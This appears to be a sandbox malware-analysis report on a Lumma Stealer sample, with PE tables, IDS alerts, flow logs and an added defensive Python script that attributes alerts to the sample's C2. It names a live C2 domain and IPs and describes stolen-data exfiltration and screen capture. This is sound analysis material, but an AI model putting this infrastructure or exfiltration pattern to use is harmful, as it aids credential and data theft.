.rdata | 0x36000 | 0x29a3 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x39000 | 0xa1f0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.&u&u | 0x44000 | 0x36f016 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.&u&u | 0x3b4000 | 0x3c0 | 0x400 | 19b8cb995ffb893e00dbfb0795e174ae | False | 0.068359375 | data | 0.383658687067457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.&u&u | 0x3b5000 | 0x561a40 | 0x561c00 | 9b271b4664eb0e7f8ccb5109aa1d1dc5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x917000 | 0x1a44 | 0x1c00 | f8c64e5e41e680232c2e129032909c1a | False | 0.3482142857142857 | data | 5.704521817564908 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x919000 | 0xe648d | 0xe6600 | 18970bbb712203ef2e06870aa152e03b | False | 0.2752019889446555 | data | 5.392114485394829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TYPELIB | 0x919740 | 0xb37c8 | data | English | United States | 0.2786108360447022
RT_ICON | 0x9ccf08 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.238672660593872
RT_ICON | 0x9dd730 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.543918918918919
RT_ICON | 0x9dd858 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.4648014440433213
RT_ICON | 0x9de100 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.48559907834101385
RT_ICON | 0x9de7c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4125722543352601
RT_ICON | 0x9ded30 | 0x330f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9830158365848061
RT_ICON | 0x9e2040 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.07620075712764698
RT_ICON | 0x9f2868 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.1459022201228153
RT_ICON | 0x9f6a90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.26224066390041495
RT_ICON | 0x9f9038 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.2718105065666041
RT_ICON | 0x9fa0e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4184426229508197
RT_ICON | 0x9faa68 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | English | United States | 0.44709302325581396
RT_ICON | 0x9fb120 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.499113475177305
RT_ICON | 0x9fb588 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.4274193548387097
RT_ICON | 0x9fb870 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.6047297297297297
RT_ICON | 0x9fb998 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 256 | English | United States | 0.631578947368421
RT_ICON | 0x9fbac8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.38306451612903225
RT_ICON | 0x9fbdb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.6642599277978339
RT_ICON | 0x9fc658 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 256 | English | United States | 0.4901315789473684
RT_ICON | 0x9fc788 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.43548387096774194
RT_ICON | 0x9fca70 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.6859205776173285
RT_ICON | 0x9fd318 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 256 | English | United States | 0.5328947368421053
RT_ICON | 0x9fd448 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.375
RT_ICON | 0x9fd730 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.6299638989169675
RT_ICON | 0x9fdfd8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 256 | English | United States | 0.3881578947368421
RT_ICON | 0x9fe108 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.2217741935483871
RT_ICON | 0x9fe3f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.6403429602888087
RT_GROUP_ICON | 0x9fec98 | 0x14 | Targa image data - Map 32 x 2088 x 1 +1 | English | United States | 1.15
RT_GROUP_ICON | 0x9fecac | 0xae | data | English | United States | 0.6724137931034483
RT_GROUP_ICON | 0x9fed5c | 0x22 | data | English | United States | 1.0588235294117647
RT_GROUP_ICON | 0x9fed80 | 0x30 | data | English | United States | 1.0
RT_GROUP_ICON | 0x9fedb0 | 0x30 | data | English | United States | 1.0
RT_GROUP_ICON | 0x9fede0 | 0x30 | data | English | United States | 1.0
RT_GROUP_ICON | 0x9fee10 | 0x30 | data | English | United States | 1.0
RT_MANIFEST | 0x9fee40 | 0x64d | ASCII text, with very long lines (1613), with no line terminators | English | United States | 0.4221946683199008
Note: the "Targa image data" type on the 20-byte RT_GROUP_ICON is a libmagic misidentification of an icon group directory (6-byte header plus one 14-byte entry), not an embedded image, and ZLIB Complexity values above 1.0 on the tiny RT_GROUP_ICON entries only mean zlib's own overhead exceeded the input size. The large icon set and TYPELIB resource are decoy resources typical of a repackaged installer; the stealer code is in the .&u&u sections, not here.
DLL | Import
KERNEL32.dll | ExitProcess
OLEAUT32.dll | SysAllocString
ole32.dll | CoCreateInstance
USER32.dll | GetDC
GDI32.dll | BitBlt
KERNEL32.dll | GetSystemTimeAsFileTime
KERNEL32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
Note: the static import table is minimal. LoadLibraryA and GetProcAddress are all the packed code needs to resolve every other API at runtime, so this list says almost nothing about what the stealer actually calls; GetDC and BitBlt (screen capture, consistent with the "screen." upload flagged in the IDS alerts below) are the one functional hint it leaks.
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T06:32:14.245872+0200 | UDP | 2050741 | ET MALWARE Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop) | 64356 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-25T06:32:14.809412+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49704 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:15.288502+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49704 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:15.786545+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49705 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:16.198325+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 49705 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:17.095113+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49706 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:17.529035+0200 | TCP | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 49706 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:18.200098+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49707 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:19.915054+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49708 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:22.373614+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49709 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:22.783296+0200 | TCP | 2844041 | ETPRO HUNTING Suspicious Zipped Filename in Outbound POST Request (Processes.txt) M2 | 49709 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:23.801097+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49710 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:23.805727+0200 | TCP | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 49710 | 443 | 192.168.2.5 | 188.114.97.3
2024-07-25T06:32:31.135756+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49711 | 40.68.123.157 | 192.168.2.5
2024-07-25T06:33:09.496760+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49717 | 40.68.123.157 | 192.168.2.5
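The alert table mixes three kinds of signal: the Lumma-specific hits on the flows to 188.114.97.3, the generic JA3 fingerprint alerts on the same flows, and two inbound CVE-2016-2211 alerts from 40.68.123.157, an address that never appears in the DNS answer below. A useful first triage step is to attribute each alert to the sample only when one of its endpoints is an address the C2 domain actually resolved to, and to keep everything else for a human to check rather than folding it into the sample's activity. The script below does that and also splits the resolved addresses into "contacted" and "resolved but never contacted" (188.114.96.3 is in the DNS answer but in no flow). It is an added example, not part of the Joe Sandbox report; the alert rows are a constructed subset copied from the table above (one per distinct signature) and the DNS answer is the one printed further down.

```python
"""Attribute IDS alerts to a sample's C2 by correlating flow endpoints with the
addresses its C2 domain resolved to. Example code added here, not part of the
Joe Sandbox report. Alert rows and the DNS answer are constructed from the
report's own tables."""
from collections import defaultdict
from dataclasses import dataclass

SANDBOX_HOST = "192.168.2.5"

# Constructed from the DNS answer section of this report (two A records).
DNS_ANSWERS = {"resergvearyinitiani.shop": {"188.114.97.3", "188.114.96.3"}}


@dataclass(frozen=True)
class Alert:
    ts: str
    proto: str
    sid: int
    signature: str
    sport: int
    dport: int
    src: str
    dst: str


# Constructed subset of the alert table above: one row per distinct signature.
ALERTS = [
    Alert("2024-07-25T06:32:14.245872+0200", "UDP", 2050741,
          "ET MALWARE Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop)",
          64356, 53, SANDBOX_HOST, "1.1.1.1"),
    Alert("2024-07-25T06:32:14.809412+0200", "TCP", 2028371,
          "ET JA3 Hash - Possible Malware - Fake Firefox Font Update",
          49704, 443, SANDBOX_HOST, "188.114.97.3"),
    Alert("2024-07-25T06:32:15.288502+0200", "TCP", 2054653,
          "ET MALWARE Lumma Stealer CnC Host Checkin",
          49704, 443, SANDBOX_HOST, "188.114.97.3"),
    Alert("2024-07-25T06:32:17.529035+0200", "TCP", 2048094,
          "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration",
          49706, 443, SANDBOX_HOST, "188.114.97.3"),
    Alert("2024-07-25T06:32:22.783296+0200", "TCP", 2844041,
          "ETPRO HUNTING Suspicious Zipped Filename in Outbound POST Request (Processes.txt) M2",
          49709, 443, SANDBOX_HOST, "188.114.97.3"),
    Alert("2024-07-25T06:32:23.805727+0200", "TCP", 2843864,
          "ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2",
          49710, 443, SANDBOX_HOST, "188.114.97.3"),
    Alert("2024-07-25T06:32:31.135756+0200", "TCP", 2022930,
          "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow",
          443, 49711, "40.68.123.157", SANDBOX_HOST),
]


def resolved_ips(dns_answers) -> set:
    return set().union(*dns_answers.values())


def attribute(alert: Alert, c2_ips: set) -> str:
    """'c2' when either endpoint is a resolved C2 address, 'dns' for the
    resolver lookup itself, 'unattributed' for anything else (review by hand)."""
    if alert.src in c2_ips or alert.dst in c2_ips:
        return "c2"
    if alert.proto == "UDP" and alert.dport == 53:
        return "dns"
    return "unattributed"


def triage(alerts, dns_answers, sandbox_host=SANDBOX_HOST) -> dict:
    """Bucket alerts and record direction and the non-sandbox peer for each."""
    c2_ips = resolved_ips(dns_answers)
    buckets = defaultdict(list)
    for a in alerts:
        direction = "outbound" if a.src == sandbox_host else "inbound"
        peer = a.dst if direction == "outbound" else a.src
        buckets[attribute(a, c2_ips)].append((a.sid, direction, peer))
    return dict(buckets)


def iocs(alerts, dns_answers) -> dict:
    """Domain plus resolved addresses, split into those seen in alert flows and
    those only returned by DNS; both belong on a blocklist."""
    c2_ips = resolved_ips(dns_answers)
    contacted = {a.dst for a in alerts if a.dst in c2_ips} | \
                {a.src for a in alerts if a.src in c2_ips}
    return {"domains": sorted(dns_answers),
            "contacted_ips": sorted(contacted),
            "resolved_only_ips": sorted(c2_ips - contacted)}


if __name__ == "__main__":
    for bucket, rows in triage(ALERTS, DNS_ANSWERS).items():
        print(bucket)
        for sid, direction, peer in rows:
            print(f"  sid={sid} {direction} peer={peer}")
    print(iocs(ALERTS, DNS_ANSWERS))
```

The CVE-2016-2211 rows land in the unattributed bucket as inbound traffic from 40.68.123.157; nothing on the page ties that host to the sample, so they should be checked separately instead of being reported as stealer behaviour. The JA3 alerts stay attributed because they ride on the C2 flows, but a JA3 match on its own is a weak indicator and should not be the basis for a detection without the Lumma-specific hits beside it.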
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 06:32:14.267342091 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.267400026 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:14.267519951 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.269476891 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.269496918 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:14.809238911 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:14.809412003 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.813173056 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.813183069 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:14.813615084 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:14.856743097 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.885627031 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.885627031 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:14.885759115 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.288475990 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.288570881 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.288635969 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.291486979 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.291515112 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.291610003 CEST | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.291618109 CEST | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.298469067 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.298520088 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.298588991 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.298867941 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.298882961 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.786446095 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.786545038 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.788110971 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.788120031 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.788397074 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:15.790098906 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.790175915 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:15.790230989 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.198307991 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.200299025 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.200396061 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.200418949 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.202692032 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.202723026 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.202735901 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.202745914 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.202790976 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.204832077 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.207096100 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.207113028 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.207139015 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.207146883 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.207187891 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.208971977 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.210802078 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.210824013 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.210865974 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.210874081 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.210895061 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.210920095 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.210948944 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.211041927 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.211055040 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.211066008 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.211070061 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.600608110 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.600671053 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:16.600744009 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.601255894 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:16.601274014 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.094953060 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.095113039 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.096843004 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.096853971 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.097119093 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.098756075 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.098937988 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.098968983 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.529051065 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.529165030 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.529290915 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.529495001 CEST | 49706 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.529515028 CEST | 443 | 49706 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.684526920 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.684580088 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:17.684717894 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.706597090 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:17.706612110 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.199215889 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.200098038 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.201119900 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.201138973 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.201402903 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.202955008 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.203136921 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.203169107 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.203234911 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.203250885 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.918818951 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.918909073 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:18.918972015 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.919543028 CEST | 49707 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:18.919563055 CEST | 443 | 49707 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.445174932 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.445231915 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.445306063 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.445602894 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.445622921 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.914769888 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.915054083 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.916317940 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.916342020 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.916604996 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.917933941 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.918143988 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.918176889 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:19.918243885 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:19.918255091 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:20.450418949 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:20.450521946 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:20.450584888 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:20.450936079 CEST | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:20.450961113 CEST | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:21.884136915 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:21.884185076 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:21.884260893 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:21.884648085 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:21.884661913 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.373385906 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.373614073 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.374872923 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.374886990 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.375140905 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.376507044 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.376507044 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.376538038 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.783318043 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.783417940 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:22.783478975 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.783797026 CEST | 49709 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:22.783823967 CEST | 443 | 49709 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.331752062 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.331815958 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.331957102 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.332554102 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.332578897 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.800941944 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.801096916 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.802431107 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 06:32:23.802464962 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.802721024 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 06:32:23.804306984 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
